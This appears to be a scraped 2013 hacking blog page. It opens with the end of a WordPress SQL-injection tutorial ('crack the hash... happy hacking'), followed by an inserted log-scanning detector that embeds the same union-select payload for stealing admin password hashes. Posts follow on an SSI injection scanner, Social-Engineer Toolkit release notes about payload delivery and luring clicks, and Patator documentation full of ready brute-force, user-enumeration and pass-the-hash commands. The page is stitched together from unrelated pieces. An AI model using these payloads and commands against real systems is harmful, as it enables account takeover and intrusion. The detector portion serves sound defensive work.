<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">Hit enter and you will get a page like this:</span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><img alt="[IMG]" class="bbCodeImage LbImage" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ5GBFZAm1o_YPsZmPU074S35TuPqyYkG7LxK78H0RGre-MOe35IT0n3hu-psAe1DjYr_fKzWeUgdPxrmRktarHKmzTD_KtAEieSiXv2u1n4PfYAz7ArC_Nb5UvTEVy2jNQzUHyr7iaT8s/s1600/Capture.PNG" style="border: 0px; max-width: 100%;" /></span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">Now you have the admin username of the page and the password hash. Crack the hash and you will get the password.</span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">happy hacking :joy</span></div>
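The injected URL above is also exactly what a site owner can look for in the web server's access log. The following is an added example, not code from the original post: it parses combined-format log lines, URL-decodes each query-string parameter, normalises the value and scores SQL-injection indicators, so the tutorial's union-select request is flagged while a normal fbuserid=42 request is not. It goes slightly beyond the page by also handling double percent-encoding and inline /**/ comment obfuscation. The log lines, client addresses, indicator weights and threshold are constructed assumptions.

```python
"""Flag union-based SQL injection attempts in web server access logs.

Added example, not part of the original post. Decodes and normalises each
query-string value, then scores indicator patterns; a value at or above
THRESHOLD produces a finding. Log lines and weights are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined log format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# (pattern, weight, label); applied to the normalised value.
INDICATORS = [
    (re.compile(r"\bunion\b\s+(all\s+)?select\b"), 5, "union select"),
    (re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+"), 2, "numeric tautology/contradiction"),
    (re.compile(r"\bfrom\s+wp_users\b"), 4, "wp_users table reference"),
    (re.compile(r"\bconcat\s*\("), 2, "concat()"),
    (re.compile(r"\b0x[0-9a-f]{2,}\b"), 1, "hex literal"),
    (re.compile(r"(--|#|/\*)\s*$"), 2, "trailing comment terminator"),
]
THRESHOLD = 5


def normalise(value):
    """Percent-decode twice (catches double encoding), drop /**/ comments,
    collapse whitespace and lower-case, so obfuscated variants score too."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def score_parameter(value):
    """Return (score, [labels]) for one query-string value."""
    text = normalise(value)
    hits = [(weight, label) for rx, weight, label in INDICATORS if rx.search(text)]
    return sum(w for w, _ in hits), [label for _, label in hits]


def scan_log(lines):
    """One finding per request parameter whose score reaches THRESHOLD."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.group(1), m.group(4)
        for key, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            score, labels = score_parameter(value)
            if score >= THRESHOLD:
                findings.append({"client": client, "param": key, "score": score, "indicators": labels})
    return findings


# Constructed log lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
# Line 2 carries the tutorial's payload; line 3 is an encoded variant of the same idea.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Sep/2013:14:20:11 -0700] "GET /?fbconnect_action=myhome&fbuserid=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Sep/2013:14:21:03 -0700] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)+z0mbyak,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 6010',
    '203.0.113.9 - - [02/Sep/2013:14:21:40 -0700] "GET /?fbconnect_action=myhome&fbuserid=1%20and%201%3D2%20union%2F%2A%2A%2Fselect%201%2C2%20from%20wp_users%2D%2D HTTP/1.1" 200 6010',
    '198.51.100.2 - - [02/Sep/2013:14:22:00 -0700] "GET /wp-login.php HTTP/1.1" 200 3100',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} param={f['param']} score={f['score']} {f['indicators']}")
```

Scoring rather than matching a single keyword keeps a legitimate value such as a post title containing the word "select" below the threshold, while the combination seen in the tutorial (union select, a contradiction, a reference to wp_users and a comment terminator) scores far above it. The real fix on the application side remains the same as for any SQL injection: the plugin must treat the user id as an integer and pass it through a prepared statement rather than concatenating it into the query.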
<div><b>Ssiscan - SSI injection scanner</b> (posted by Fahim, 2013-09-02)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gEXRIJlKvfIIFAJ1QjHjLxrOvrfKAtK8w17L5L9DK6BLInZyuiEHM2Bmzxl0BRufrcgsAqVlDRrMS41-5N06JBRXd6mIGeV6sOOe6MrpdWDhZXKQi5waigg1md3eOIFIMiwOwBrw86KM/s1600/hck.jpg" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gEXRIJlKvfIIFAJ1QjHjLxrOvrfKAtK8w17L5L9DK6BLInZyuiEHM2Bmzxl0BRufrcgsAqVlDRrMS41-5N06JBRXd6mIGeV6sOOe6MrpdWDhZXKQi5waigg1md3eOIFIMiwOwBrw86KM/s1600/hck.jpg" style="border: none; padding: 0px;" width="400" /></span></a></div>
<span style="background-color: white;"><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">SSI-Scan is a basic PoC tool that helps with the discovery of SSI injection vulnerabilities, a fairly rare and under-documented code injection vulnerability in which Server Side Includes directives are executed without proper validation and may lead to a system compromise or complete server enumeration.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">At this point, SSI-Scan tests for injection by sending a POST request carrying a hardcoded payload, or by injecting a payload into forms specified by the user, and then looking for environment variable matches in the page source.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">SSI-Scan requires BeautifulSoup4 and mechanize.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">Example usage:</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">python ssi-scan.py -u http://example.com</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">python ssi-scan.py -u http://example.com --form_uname username --form_passwd password</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">For more information on SSI injection:</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection</a><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="http://capec.mitre.org/data/definitions/101.html" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">http://capec.mitre.org/data/definitions/101.html</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;">Source-</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://n0where.net/ssi-scan-ssi-injection-scanner/" style="background-color: white; outline: none;"><span style="color: black;">http://n0where.net/ssi-scan-ssi-injection-scanner/</span></a></div>
</div>
Fahim, 2013-09-02: The Social-Engineer Toolkit (SET) v5.3 Released<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">TrustedSec is proud to announce the release of The Social-Engineer Toolkit (SET) v5.3 codename “NextGen Unicorn”. This release is recommended for any users that utilize the toolkit and has a number of critical bug fixes and feature enhancements. This version incorporates a number of new attack and payload delivery systems including an improved Java Applet, better bypass of newer preventative technologies, and improved PowerShell deployment techniques. This version was over two months of solid development in providing some new advanced attack vectors as well as stability and bug fixes for the new version.</span></span><br />
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglho2rU9tKM8M6nRxMQjZ4nheoBEzqE5cd4cEqf7XD7j6jVsMyHxEvkG0cXgfvLoNeK4jL19mmmpdaG-7ROmkU2Bsvyf5_tV8Cm2PTzO2OmWITnQNvJSkYff1kD5tA4O-ziMutrpG6l1ON/s1600/SET-update+(2).png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglho2rU9tKM8M6nRxMQjZ4nheoBEzqE5cd4cEqf7XD7j6jVsMyHxEvkG0cXgfvLoNeK4jL19mmmpdaG-7ROmkU2Bsvyf5_tV8Cm2PTzO2OmWITnQNvJSkYff1kD5tA4O-ziMutrpG6l1ON/s1600/SET-update+(2).png" style="border: none; padding: 0px;" width="400" /></span></a></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">In addition to these changes, the new version also incorporates brand new versions of Multi-Pyinjector and PyInjector, which have much more stable shellcode injection into memory and AES 256 encrypted payload delivery systems.</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">Please note, there was one major change in the functionality of SET. From now on, to run SET it is recommended to type “setoolkit” instead of “se-toolkit”. This was done because “SET” is the name people know the toolkit by; when tab-completing on Linux this wasn’t apparent, but by typing “set” and tabbing you should now see the launcher. Right now, se-toolkit still works but will be removed in the next version of SET.</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span id="more-2096" style="background-color: white;"></span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">Full changelog below:</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">~~~~~~~~~~~~~~~~<br />version 5.3<br />~~~~~~~~~~~~~~~~</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">* Fixed an issue that would cause ipaddr to not be defined when using multi-pyinjector<br />* Changed se-toolkit for launch to setoolkit – easier to type when typing set<br />* Fixed an issue that would cause set-automate to not properly work due to old set launcher<br />* Added set EnableStageEncoding true to default on Multipyinjector<br />* Added fixed ID param name="" to applet tags to show up properly in Firefox, Chrome, etc.<br />* Converted payloads for shikata second stage encoding for all SET payloads<br />* Fixed an exceptions error when inside modules and control-c out of them<br />* Removed old wording in setup.py installer<br />* Added new conversion for setup.py to change se-toolkit to install with setoolkit<br />* Slimmed the teensy powershell code down significantly<br />* Modified the teensy powershell attack to support the x86 downgrade attack<br />* Slimmed down the mssql powershell attack vector significantly<br />* Slimmed down the psexec powershell attack vector significantly<br />* Updated rid_enum to the latest version within Fast-Track<br />* Realigned initial banner message when entering into SET<br />* Fixed a large bug in webjacking and tabnabbing where it would not load the index.html properly due to an os.remove on index.html instead of os.remove on site variable (index or index2.html)<br />* Removed old man left in the middle from the toolkit under multi-attack, was no longer used and code removed<br />* Fixed an issue that would cause credential harvester and applet in multiattack to not properly work<br />* Fixed a bug that would cause APACHE to flag if it was run in a different directory<br />* Changed applet tag slightly to be more descriptive to coax users into clicking<br />* Fixed a backup issue when using java applet first then harvester second<br />* Fixed a large bug in multi-pyinjector that was causing the binary to not call back properly<br />* Fixed multiple other bugs with multi-pyinjector and also fixing freeze.support issues with multiprocessing<br />* Fixed a bug that would cause an IP to not assign when using pyinjector<br />* Added better stability to pyinjector regular and also virtualized the pe<br />* Fixed an issue causing linux and OSX binaries to not properly deploy<br />* Added faster load time on OSX and Linux creation of binaries when linux / osx mode added<br />* Changed how payload delivery is handled and loads faster within the applet<br />* Added better error handling if webattack email is set to on<br />* Fixed some old code from when you are in a loop<br />* Added a port options check when specifying multipyinjector and pyinjector to warn if port 80 is selected</span></div>
<span style="background-color: white;"><span style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;"><br /></span><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span></span>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;">
<span style="font-family: arial, Oxygen, sans-serif;"><span style="background-color: white; font-size: 14px; line-height: 21.6875px;">Source-</span></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;">
<a href="https://www.trustedsec.com/august-2013/the-social-engineer-toolkit-set-v5-3-released/" style="background-color: white; outline: none;"><span style="color: black;">https://www.trustedsec.com/august-2013/the-social-engineer-toolkit-set-v5-3-released/</span></a></div>
</div>
Fahim, 2013-09-02: Patator Brute Forcer 0.5 - multi-purpose brute-forcer<div dir="ltr" style="text-align: left;" trbidi="on">
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
- ftp_login : Brute-force FTP
- ssh_login : Brute-force SSH
- telnet_login : Brute-force Telnet
- smtp_login : Brute-force SMTP
- smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command
- smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command
- finger_lookup : Enumerate valid users using Finger
- http_fuzz : Brute-force HTTP
- pop_login : Brute-force POP3
- pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
- imap_login : Brute-force IMAP4
- ldap_login : Brute-force LDAP
- smb_login : Brute-force SMB
- smb_lookupsid : Brute-force SMB SID-lookup
- vmauthd_login : Brute-force VMware Authentication Daemon
- mssql_login : Brute-force MSSQL
- oracle_login : Brute-force Oracle
- mysql_login : Brute-force MySQL
- mysql_queries : Brute-force MySQL queries
- pgsql_login : Brute-force PostgreSQL
- vnc_login : Brute-force VNC
- dns_forward : Brute-force DNS
- dns_reverse : Brute-force DNS (reverse lookup subnets)
- snmp_login : Brute-force SNMPv1/2 and SNMPv3
- unzip_pass : Brute-force the password of encrypted ZIP files
- keystore_pass : Brute-force the password of Java keystore files
Future modules to be implemented:
- rdp_login
The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo
"Whatever the payload to fire, always use the same cannon"
* Why ?
Basically, I got tired of using Medusa, Hydra, Ncrack, Metasploit auxiliary modules, Nmap NSE scripts and the like because:
- they either do not work or are not reliable (got me false negatives several times in the past)
- they are not flexible enough (how to iterate over all wordlists, fuzz any module parameter)
- they lack useful features (display progress or pause during execution)
FEATURES
--------
* No false negatives, as it is the user that decides what results to ignore based on:
+ status code of response
+ size of response
+ matching string or regex in response data
+ ... see --help
* Modular design
+ not limited to network modules (eg. the unzip_pass module)
+ not limited to brute-forcing (eg. remote exploit testing, or vulnerable version probing)
* Interactive runtime
+ show progress during execution (press Enter)
+ pause/unpause execution (press p)
+ increase/decrease verbosity
+ add new actions & conditions during runtime (eg. to exclude more types of response from showing)
+ ... press h to see all available interactive commands
* Use persistent connections (ie. will test several passwords until the server disconnects)
* Multi-threaded
* Flexible user input
- Any module parameter can be fuzzed:
+ use the FILE keyword to iterate over a file
+ use the COMBO keyword to iterate over a combo file
+ use the NET keyword to iterate over every hosts of a network subnet
+ use the RANGE keyword to iterate over hexadecimal, decimal or alphabetical ranges
+ use the PROG keyword to iterate over the output of an external program
- Iteration over the joined wordlists can be done in any order
* Save every response (along with request) to separate log files for later reviewing
INSTALL
* Dependencies (best tested versions)
  Dependency    | Required for   | URL                                            | Version |
  --------------+----------------+------------------------------------------------+---------+
  paramiko      | SSH            | http://www.lag.net/paramiko/                   | 1.7.7.1 |
  pycurl        | HTTP           | http://pycurl.sourceforge.net/                 | 7.19.0  |
  openldap      | LDAP           | http://www.openldap.org/                       | 2.4.24  |
  impacket      | SMB            | http://code.google.com/p/impacket/             | svn#765 |
  cx_Oracle     | Oracle         | http://cx-oracle.sourceforge.net/              | 5.1.1   |
  mysql-python  | MySQL          | http://sourceforge.net/projects/mysql-python/  | 1.2.3   |
  psycopg       | PostgreSQL     | http://initd.org/psycopg/                      | 2.4.5   |
  pycrypto      | VNC            | http://www.dlitz.net/software/pycrypto/        | 2.3     |
  dnspython     | DNS            | http://www.dnspython.org/                      | 1.10.0  |
  pysnmp        | SNMP           | http://pysnmp.sourceforge.net/                 | 4.2.1   |
  pyasn1        | SNMP           | http://sourceforge.net/projects/pyasn1/        | 0.1.2   |
  IPy           | NETx keywords  | https://github.com/haypo/python-ipy            | 0.75    |
  unzip         | ZIP passwords  | http://www.info-zip.org/                       | 6.0     |
  Java          | keystore files | http://www.oracle.com/technetwork/java/javase/ | 6       |
  python        |                | http://www.python.org/                         | 2.7     |
* Shortcuts (optional)
ln -s path/to/patator.py /usr/bin/ftp_login
ln -s path/to/patator.py /usr/bin/http_fuzz
so on ...
USAGE
-----
$ python patator.py <module> -h
or
$ <module> -h (if you created the shortcuts)
There are global options and module options:
- all global options start with - or --
- all module options are of the form option=value
All module options are fuzzable:
---------
./module host=FILE0 port=FILE1 foobar=FILE2.google.FILE3 0=hosts.txt 1=ports.txt 2=foo.txt 3=bar.txt
The keywords (FILE, COMBO, NET, ...) act as place-holders. They indicate the type of wordlist
and where to replace themselves with the actual words to test.
Each keyword is numbered in order to:
- match the corresponding wordlist
- and indicate in what order to iterate over all the wordlists
For instance, this would be the classic order:
---------
$ ./module host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt
10.0.0.1 root password
10.0.0.1 root 123456
10.0.0.1 root qsdfghj
... (trying all passwords before testing next login)
10.0.0.1 admin password
10.0.0.1 admin 123456
10.0.0.1 admin qsdfghj
... (trying all logins before testing next host)
10.0.0.2 root password
...
While a smarter way might be:
---------
$ ./module host=FILE2 user=FILE1 password=FILE0 2=hosts.txt 1=logins.txt 0=passwords.txt
10.0.0.1 root password
10.0.0.2 root password
10.0.0.1 admin password
10.0.0.2 admin password
10.0.0.1 root 123456
10.0.0.2 root 123456
10.0.0.1 admin 123456
...
* Keywords
Brute-force a list of hosts with a file containing combo entries (each line := login:password).
---------
./module host=FILE0 user=COMBO10 password=COMBO11 0=hosts.txt 1=combos.txt
Scan subnets to just grab version banners.
---------
./module host=NET0 0=10.0.1.0/24,10.0.2.0/24,10.0.3.128-10.0.3.255
Fuzzing a parameter by iterating over a range of values.
---------
./module param=RANGE0 0=hex:0x00-0xffff
./module param=RANGE0 0=int:0-500
./module param=RANGE0 0=lower:a-zzz
* Actions & Conditions
Use the -x option to do specific actions upon receiving expected results. For instance:
To ignore responses with status code 200 *AND* a size within a range.
---------
./module host=10.0.0.1 user=FILE0 -x ignore:code=200,size=57-74
To ignore responses with status code 500 *OR* containing "Internal error".
---------
./module host=10.0.0.1 user=FILE0 -x ignore:code=500 -x ignore:fgrep='Internal error'
Remember that conditions are ANDed within the same -x option, use multiple -x options to
specify ORed conditions.
* Failures
During execution, failures may happen, such as a TCP connect timeout for
instance. A failure is actually an exception that the module does not expect,
and as a result the exception is caught upstream by the controller.
Such exceptions, or failures, are not immediately reported to the user, the
controller will retry 4 more times (see --max-retries) before reporting the
failed payload with logging level "FAIL".
* Read carefully the following examples to get a good understanding of how patator works.
{{{ FTP
* Brute-force authentication. Do not report wrong passwords.
---------
ftp_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg='Login incorrect.'
NB0. If you get errors like "500 OOPS: priv_sock_get_cmd", use -x ignore,reset,retry:code=500
in order to retry the last login/password using a new TCP connection. Odd servers like vsftpd
return this when they shut down the TCP connection (ie. max login attempts reached).
NB1. If you get errors like "too many connections from your IP address", try decreasing the number of
threads, the server may be enforcing a maximum number of concurrent connections.
* Same as before, but stop testing a user after his password is found.
---------
ftp_login ... -x free=user:code=0
* Find anonymous FTP servers on a subnet.
---------
ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24
}}}
{{{ SSH
* Brute-force authentication with password same as login (aka single mode). Do not report wrong passwords.
---------
ssh_login host=10.0.0.1 user=FILE0 password=FILE0 0=logins.txt -x ignore:mesg='Authentication failed.'
NB. If you get errors like "Error reading SSH protocol banner ... Connection reset by peer",
try decreasing the number of threads, the server may be enforcing a maximum
number of concurrent connections (eg. MaxStartups in OpenSSH).
* Brute-force several hosts and stop testing a host after a valid password is found.
---------
ssh_login host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt -x free=host:code=0
* Same as previous, but stop testing a user on a host after his password is found.
---------
ssh_login host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt -x free=host+user:code=0
}}}
{{{ Telnet
* Brute-force authentication.
(a) Enter login after first prompt is detected, enter password after second prompt.
(b) The regex to detect the login and password prompts.
(c) Reconnect when we get no login prompt back (max number of tries reached or successful login).
telnet_login host=10.0.0.1 inputs='FILE0\nFILE1' 0=logins.txt 1=passwords.txt              (a)
  prompt_re='tux login:|Password:' -x reset:egrep!='Login incorrect.+tux login:'      (b) (c)
NB. If you get errors like "telnet connection closed", try decreasing the number of threads,
the server may be enforcing a maximum number of concurrent connections.
}}}
{{{ SMTP
* Enumerate valid users using the VRFY command.
(a) Do not report invalid recipients.
(b) Do not report when the server shuts us down with "421 too many errors",
reconnect and resume testing.
smtp_vrfy host=10.0.0.1 user=FILE0 0=logins.txt -x ignore:fgrep='User unknown in local recipient table'   (a)
  -x ignore,reset,retry:code=421                                                                           (b)
* Use the RCPT TO command in case the VRFY command is not available.
smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt helo='ehlo mx.fb.com' mail_from=root
* Brute-force authentication.
(a) Send a fake hostname (by default your host fqdn is sent)
(a)
smtp_login host=10.0.0.1 helo='ehlo its.me.com' user=FILE0@dom.com password=FILE1 0=logins.txt 1=passwords.txt
}}}
{{{ HTTP
* Find hidden web resources.
(a) Use a specific header.
(b) Follow redirects.
(c) Do not report 404 errors.
(d) Retry on 500 errors.
---------
http_fuzz url=http://localhost/FILE0 0=words.txt header='Cookie: SESSID=A2FD8B2DA4'   (a)
  follow=1 -x ignore:code=404 -x ignore,retry:code=500                                 (b) (c) (d)
NB. You may be able to go 10 times faster using webef (http://www.hsc.fr/ressources/outils/webef/).
It is the fastest HTTP brute-forcer I know, yet at the moment it still lacks useful features
that will prevent you from performing the following attacks.
* Brute-force phpMyAdmin logon.
(a) Use POST requests.
(b) Follow redirects using cookies sent by server.
(c) Ignore failed authentications.
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST follow=1 accept_cookie=1   (a) (b) (b)
  body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt
  -x ignore:fgrep='Cannot log in to the MySQL server'                                      (c)
* Scan subnet for directory listings.
(a) Ignore non-matching responses.
(b) Save matching responses into a directory.
http_fuzz url=http://NET0/FILE1 0=10.0.0.0/24 1=dirs.txt -x ignore:fgrep!='Index of'   (a)
  -l /tmp/directory_listings                                                            (b)
* Brute-force Basic authentication.
(a) Single mode (login == password).
(b) Do not report failed login attempts.
http_fuzz url=http://10.0.0.1/manager/html user_pass=FILE0:FILE0 0=logins.txt -x ignore:code=401   (a) (b)
* Find hidden virtual hosts.
(a) Read template from file.
(b) Fuzz both the Host and User-Agent headers.
echo -e 'Host: FILE0\nUser-Agent: FILE1' > headers.txt
http_fuzz url=http://10.0.0.1/ header=@headers.txt 0=vhosts.txt 1=agents.txt   (a) (b)
* Brute-force logon using GET requests.
(a) Encode everything surrounded by the two tags _@@_ in hexadecimal.
(b) Ignore HTTP 200 responses with a content size (header+body) within given range
and that also contain the given string.
(c) Use a different delimiter string because the comma cannot be escaped.
http_fuzz url='http://10.0.0.1/login?username=admin&password=_@@_FILE0_@@_' -e _@@_:hex            (a) (a)
  0=words.txt -x ignore:'code=200|size=1500-|fgrep=Welcome, unauthenticated user' -X '|'   (b) (c)
* Brute-force logon that enforces two random nonces to be submitted along every POST.
(a) First, request the page that provides the nonces as hidden input fields.
(b) Use regular expressions to extract the nonces that are to be submitted along the main request.
http_fuzz url=http://10.0.0.1/login method=POST body='user=admin&pass=FILE0&nonce1=_N1_&nonce2=_N2_' 0=passwords.txt accept_cookie=1
  before_urls=http://10.0.0.1/index before_egrep='_N1_:<input type="hidden" name="nonce1" value="(\w+)"|_N2_:name="nonce2" value="(\w+)"'   (a) (b)
* Test the OPTIONS method against a list of URLs.
(a) Ignore URLs that only allow the HEAD and GET methods.
(b) Header end of line is '\r\n'.
(c) Use a different delimiter string because the comma cannot be escaped.
http_fuzz url=FILE0 0=urls.txt method=OPTIONS -x ignore:egrep='^Allow: HEAD, GET\r$' -X '|'   (a) (b) (c)
}}}
{{{ LDAP
* Brute-force authentication.
(a) Do not report wrong passwords.
(b) Talk SSL/TLS to port 636.
ldap_login host=10.0.0.1 binddn='cn=FILE0,dc=example,dc=com' 0=logins.txt bindpw=FILE1 1=passwords.txt
  -x ignore:mesg='ldap_bind: Invalid credentials (49)' ssl=1 port=636   (a) (b)
}}}
{{{ SMB
* Brute-force authentication.
smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_LOGON_FAILURE
NB. If you suddenly get STATUS_ACCOUNT_LOCKED_OUT errors for an account
although it is not the first password you test on this account, then you must
have locked it.
* Pass-the-hash.
(a) Test a list of hosts.
(b) Test every user (each line := login:rid:LM hash:NT hash).
smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt -x ...   (a) (b)
}}}
{{{ MSSQL
* Brute-force authentication.
mssql_login host=10.0.0.1 user=sa password=FILE0 0=passwords.txt -x ignore:fgrep='Login failed for user'
}}}
{{{ Oracle
Beware, by default in Oracle, accounts are permanently locked out after 10 wrong passwords,
except for the SYS account.
* Brute-force authentication.
oracle_login host=10.0.0.1 user=SYS password=FILE0 0=passwords.txt sid=ORCL -x ignore:code=ORA-01017
NB0. With Oracle 10g XE (Express Edition), you do not need to pass a SID.
NB1. If you get ORA-12516 errors, it may be because you reached the limit of
concurrent connections or db processes, try using "--rate-limit 0.5 -t 2" to be
more polite. Also you can run "alter system set processes=150 scope=spfile;"
and restart your database to get rid of this.
* Brute-force SID.
oracle_login host=10.0.0.1 sid=FILE0 0=sids.txt -x ignore:code=ORA-12505
